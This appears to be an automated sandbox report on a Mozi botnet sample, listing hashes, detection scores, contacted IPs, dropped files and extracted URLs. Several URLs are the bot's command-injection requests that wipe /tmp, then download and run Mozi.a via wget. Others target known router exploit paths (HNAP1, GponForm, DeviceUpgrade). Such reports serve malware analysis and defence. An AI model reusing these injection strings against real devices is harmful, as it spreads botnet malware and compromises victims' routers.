
Mozi.m

Status: finished
Submission Time: 2020-04-21 22:56:15 +02:00
Classification: Malicious, Spreader, Trojan, Evader, Mirai

Details

  • Analysis ID:
    224306
  • API (Web) ID:
    345204
  • Analysis Started:
    2020-04-21 22:56:16 +02:00
  • Analysis Finished:
    2020-04-21 23:10:54 +02:00
  • MD5:
    4dde761681684d7edad4e5e1ffdb940b
  • SHA1:
    2327be693bc11a618c380d7d3abc2382d870d48b
  • SHA256:
    d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
  • Technologies:

Joe Sandbox

Engine: Joe Sandbox
Detection: malicious
Score: 100
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

  • malicious (Score: 37/58)
  • malicious (Score: 16/40)
  • malicious (Score: 17/31)
  • malicious

IPs

IP | Country
120.76.224.67 | China
202.144.169.183 | Australia
37.35.144.69 | Spain
109.25.230.143 | France
2.251.35.107 | Sweden
220.27.23.115 | Japan
87.105.97.67 | Poland
195.145.20.241 | Germany
165.48.146.111 | United States
22.136.13.71 | United States
27.208.42.21 | China
93.193.25.5 | Germany
212.233.102.140 | Russian Federation
112.69.99.34 | Japan
100.50.96.134 | United States
200.124.72.70 | unknown
167.52.221.238 | Canada
63.219.178.190 | United States
41.205.252.99 | Sierra Leone
91.60.67.195 | Germany
31.143.138.11 | Turkey
170.104.2.43 | United States
181.242.104.185 | Colombia
74.50.64.231 | United States
166.92.241.186 | United States
216.238.159.233 | United States
194.23.79.82 | Sweden
179.95.130.38 | Brazil
27.141.89.251 | Japan
116.120.189.146 | Korea Republic of
33.134.232.221 | United States
79.105.97.107 | Russian Federation
130.250.10.169 | United States
216.81.104.234 | United States
74.164.242.137 | United States
79.95.18.115 | France
8.101.42.109 | United States
128.16.44.205 | United Kingdom
173.197.98.207 | United States
188.81.82.200 | Portugal
80.87.217.17 | Slovakia (SLOVAK Republic)
185.49.116.41 | Slovenia
132.86.10.151 | United States
118.36.61.250 | Korea Republic of
70.20.58.252 | United States
7.251.52.241 | United States
187.172.5.233 | Mexico
184.66.6.216 | Canada
221.203.14.87 | China
69.204.115.234 | United States
184.28.138.61 | United States
188.165.19.41 | France
151.36.2.193 | Italy
112.155.143.53 | Korea Republic of
182.25.148.205 | Indonesia
137.78.4.151 | United States
194.130.25.8 | United Kingdom
176.184.13.167 | France
4.116.242.9 | United States
193.47.67.143 | Italy
124.69.89.81 | China
171.6.174.53 | Thailand
128.208.78.200 | United States
154.97.159.19 | Sudan
203.189.124.129 | Australia
206.139.49.93 | United States
212.188.254.125 | United Kingdom
193.66.44.224 | Finland
166.56.211.57 | United States
109.0.49.230 | France
75.12.37.28 | United States
38.141.133.56 | United States
209.183.131.124 | Canada
163.188.177.226 | United States
121.35.138.40 | China
197.165.32.64 | Egypt
184.198.125.168 | United States
77.178.122.225 | Germany
48.201.208.11 | United States
54.160.221.37 | United States
14.156.206.8 | China
6.199.46.12 | United States
40.61.159.220 | United States
77.47.9.92 | Germany
210.199.246.140 | Japan
112.239.47.58 | China
220.42.247.39 | Japan
170.249.181.99 | United States
129.194.52.156 | Switzerland
144.179.234.10 | Norway
144.43.205.101 | Netherlands
92.226.57.209 | Germany
47.215.228.10 | United States
136.72.81.153 | United States
136.14.5.72 | United States
53.121.11.219 | Germany
69.195.84.236 | United States
219.14.161.7 | Japan
170.176.148.226 | United States
159.76.43.248 | United States

URLs

Name
http://208.121.65.32:80/HNAP1/
http://207.183.160.89:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://162.144.38.224:80/HNAP1/
http://156.244.14.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://103.249.6.223:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.9.87.113:80/HNAP1/
http://93.155.211.48:80/HNAP1/
http://14.200.100.50:80/HNAP1/
http://104.19.204.118:80/HNAP1/
http://35.230.71.37:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.106.198.80:80/HNAP1/
http://35.190.27.245:80/HNAP1/
http://46.105.86.249:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://199.19.109.8:80/HNAP1/
http://172.224.185.205:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://62.41.160.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://97.102.243.81:80/HNAP1/
http://2.185.186.207:80/HNAP1/
http://2.186.68.215:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://62.212.124.97:80/HNAP1/
http://107.183.104.39:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://123.57.22.90:80/HNAP1/
http://174.127.208.187:80/HNAP1/
http://180.252.172.228:80/HNAP1/
http://99.86.127.40:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://43.248.107.91:37215/ctrlt/DeviceUpgrade_1
http://www.alsa-project.org.
http://129.125.81.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca.
http://120.83.13.207:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://www.pastebin.ca
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://upx.sf.net
http://118.193.52.146:80/HNAP1/
http://211.59.13.76:49152/soap.cgi?service=WANIPConn1
http://pastebin.ca)

Dropped files

Name | File Type
/etc/init.d/mountdevsubfs.sh | ASCII text
/usr/networks | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
/etc/rcS.d/S95baby.sh | POSIX shell script, ASCII text executable
/etc/rc.local | ASCII text
/etc/profile.d/vte-2.91.sh | ASCII text
/etc/profile.d/cedilla-portuguese.sh | ASCII text
/etc/profile.d/bash_completion.sh | ASCII text
/etc/profile.d/apps-bin-path.sh | ASCII text
/etc/profile.d/Z97-byobu.sh | ASCII text
/etc/init.d/umountnfs.sh | ASCII text
/etc/init.d/mountnfs.sh | ASCII text
/etc/init.d/mountnfs-bootclean.sh | ASCII text
/etc/init.d/mountkernfs.sh | ASCII text
/etc/init.d/mountall.sh | ASCII text
/etc/init.d/hwclock.sh | ASCII text
/etc/init.d/S95baby.sh | POSIX shell script, ASCII text executable
/etc/init.d/bootmisc.sh | ASCII text
/etc/init.d/checkfs.sh | ASCII text
/etc/init.d/checkroot-bootclean.sh | ASCII text
/etc/init.d/checkroot.sh | ASCII text
/etc/init.d/hostname.sh | ASCII text
/etc/init.d/mountall-bootclean.sh | ASCII text
/usr/share/doc/git/contrib/remotes2config.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-revert.sh | ASCII text
/usr/share/doc/git/contrib/rerere-train.sh | ASCII text
/usr/share/doc/git/contrib/subtree/git-subtree.sh | ASCII text
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh | ASCII text
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh | ASCII text
/usr/share/doc/git/contrib/git-resurrect.sh | ASCII text
/usr/share/doc/git/contrib/fast-import/git-import.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-whatchanged.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-verify-tag.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-tag.sh | ASCII text
/usr/share/doc/netcat-openbsd/examples/dist.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-resolve.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-reset.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-repack.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-pull.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-notes.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-merge.sh | ASCII text
/usr/share/doc/mdadm/examples/mdadd.sh | ASCII text
/usr/share/keyutils/request-key-debug.sh | ASCII text
/usr/share/hplip/hplip_clean.sh | ASCII text
/usr/share/doc/xdotool/examples/ffsp.sh | ASCII text
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh | ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh | ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh | ASCII text
/usr/share/doc/tmux/examples/bash_completion_tmux.sh | ASCII text
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh | ASCII text
/usr/share/doc/gdb/contrib/gdb-add-index.sh | ASCII text
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh | ASCII text
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh | ASCII text
/usr/share/doc/libsane/plustek/MakeModule.sh | ASCII text
/usr/share/doc/ifupdown/examples/ping-places.sh | ASCII text
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh | ASCII text
/usr/share/doc/ifupdown/examples/get-mac-address.sh | ASCII text
/usr/share/doc/ifupdown/examples/check-mac-address.sh | ASCII text
/etc/wpa_supplicant/ifupdown.sh | ASCII text
/usr/share/doc/acpid/examples/ac.sh | ASCII text
/usr/share/debconf/confmodule.sh | ASCII text
/usr/share/cups/braille/indexv4.sh | ASCII text
/usr/share/cups/braille/indexv3.sh | ASCII text
/usr/share/cups/braille/index.sh | ASCII text
/usr/share/cups/braille/cups-braille.sh | UTF-8 Unicode text
/usr/share/brltty/initramfs/brltty.sh | ASCII text
/usr/share/alsa/utils.sh | ASCII text
/usr/share/alsa-base/alsa-info.sh | ASCII text, with very long lines
/usr/share/doc/acpid/examples/default.sh | ASCII text
/etc/wpa_supplicant/functions.sh | ASCII text
/etc/wpa_supplicant/action_wpa.sh | ASCII text
/etc/libreoffice/soffice.sh | ASCII text
/etc/bash_completion.d/libreoffice.sh | ASCII text
/etc/acpi/undock.sh | ASCII text
/etc/acpi/tosh-wireless.sh | ASCII text
/etc/acpi/powerbtn.sh | ASCII text
/etc/acpi/ibm-wireless.sh | ASCII text
/etc/acpi/asus-wireless.sh | ASCII text
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-ls-remote.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-log.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-gc.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-fetch.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-commit.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-clone.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-clean.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-checkout.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-am.sh | OS/2 REXX batch file, ASCII text
/usr/share/doc/git/contrib/examples/git-merge-ours.sh | ASCII text
/etc/acpi/asus-keyboard-backlight.sh | ASCII text
/usr/share/doc/gdb/contrib/expect-read1.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/gdb_find.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh | ASCII text
/usr/share/doc/gawk/examples/prog/igawk.sh | awk or perl script, ASCII text
/usr/share/doc/gawk/examples/network/PostAgent.sh | ASCII text
/usr/share/doc/cron/examples/cron-tasks-review.sh | ASCII text
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh | ASCII text